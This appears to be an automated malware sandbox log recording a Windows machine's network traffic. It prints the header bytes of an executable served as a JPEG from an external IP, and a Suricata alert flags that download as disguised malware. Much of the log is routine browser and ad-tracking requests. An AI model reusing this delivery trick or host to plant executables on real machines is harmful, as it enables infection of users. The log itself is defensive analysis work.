00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 58 c7 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0a 00 00 2a 00 00 00 30 51 00 00 54 25 01 e5 1c 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 76 01 00 04 00 00 cd bd 51 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 76 01 8c 00 00 00 00 a0 25 01 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 77 28 00 00 00 10 00 00 00 2a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 00 54 25 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 fa 02 00 00 00 a0 25 01 00 04 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 26 51 00 00 b0 25 01 00 24 51 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 00 03 00 00 00 e0 76 01 00 04 00 00 00 56 51 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 11 Jan 2025 06:53:58 GMTServer: Apache/2Upgrade: h2,h2cConnection: UpgradeLast-Modified: Sun, 01 Dec 2024 14:22:40 GMTETag: "cb190-628362a1aac00"Accept-Ranges: bytesContent-Length: 831888Content-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 15 16 c8 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 fa 02 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 0c 00 00 04 00 00 7c 20 0d 00 02 00 00 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c cd 08 00 54 01 00 00 00 b0 0a 00 1c b6 01 00 00 00 00 00 00 00 00 00 f8 a1 0c 00 98 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 40 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 00 08 00 00 10 00 00 00 02 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c d9 00 00 00 20 08 00 00 da 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a5 01 00 00 00 09 00 00 68 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c b6 01 00 00 b0 0a 00 00 b8 01 00 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Joe Sandbox ViewASN Name: INPLATLABS-ASRU INPLATLABS-ASRU
    Source: Joe Sandbox ViewJA3 fingerprint: c91bde19008eefabce276152ccd51457
    Source: Network trafficSuricata IDS: 2008754 - Severity 1 - ET MALWARE Possible Rar'd Malware sent when remote host claims to send an Image : 185.125.51.5:80 -> 192.168.11.20:49757
    Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.489618fee28203b75117.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8Origin: https://ntp.msn.comsec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.059504d3b28965aa7c6d.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.80e71276f1bec5cb9e6b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.645cb4eb2f9e0802adfb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.639a3a8baab8493c4920.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /b?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578471572&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3841sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /b2?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=15091701be8ac68bbcb80111736578472
    Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveOrigin: https://assets.msn.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1FE748FF748B4324A916C66DF435B563&MUID=0136911D054E6BFC0E90846C04216AB7 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; SM=T
    Source: global trafficHTTP traffic detected: GET /sg/msn/1/cm?taboola_hm=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /uidmappixel?ext_uid=0136911D054E6BFC0E90846C04216AB7&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: OPTIONS /auction HTTP/1.1Host: srtb.msn.comConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: cache-control,content-type,x-ms-flightid,x-ms-numberline,x-msedge-clientid,x-msedge-marketOrigin: https://ntp.msn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Sec-Fetch-Mode: corsSec-Fetch-Site: same-siteSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1Host: px.ads.linkedin.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cksync.php?type=nms&cs=3&ovsid=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: hbx.media.netConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /m?cdsp=516415&c=0136911D054E6BFC0E90846C04216AB7&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.mgid.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mapuid?suid=0136911D054E6BFC0E90846C04216AB7&sid=16&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=0136911D054E6BFC0E90846C04216AB7&external=true&gdpr=0&gdpr_consent= HTTP/1.1Host: visitor.omnitagjs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: POST /auction HTTP/1.1Host: srtb.msn.comConnection: keep-aliveContent-Length: 3001sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"X-MSEdge-ClientID: 0136911D054E6BFC0E90846C04216AB7sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31x-ms-flightId: 